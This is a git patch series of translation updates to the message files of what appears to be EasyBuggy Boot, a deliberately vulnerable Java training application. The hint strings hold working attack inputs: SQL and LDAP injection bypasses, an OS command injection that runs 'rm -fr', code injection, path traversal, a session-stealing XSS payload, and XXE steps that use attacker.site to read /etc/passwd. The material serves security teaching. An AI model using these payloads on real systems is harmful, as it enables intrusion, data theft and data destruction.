+++ b/src/main/resources/messages_es.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From dc18e234d3515be7b9b06ac29fdf15252e140dcd Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:28 +0900 Subject: [PATCH 036/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From aee6eadf3a887b81ea39798dd605e420ea0a0141 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:29 +0900 Subject: [PATCH 037/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. From 4f093e6584fa873ebc8821431e326ce432e3f7e9 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 11 Apr 2018 17:11:31 +0900 Subject: [PATCH 038/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index 5b6babb..7176a05 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -55,8 +55,8 @@ function.description.thread.leak=Thread leak occurs every time you load this pag function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file 